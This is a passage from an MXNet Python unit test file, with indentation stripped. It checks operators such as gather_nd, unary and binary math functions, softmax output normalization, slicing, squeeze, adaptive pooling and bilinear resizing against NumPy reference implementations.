assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
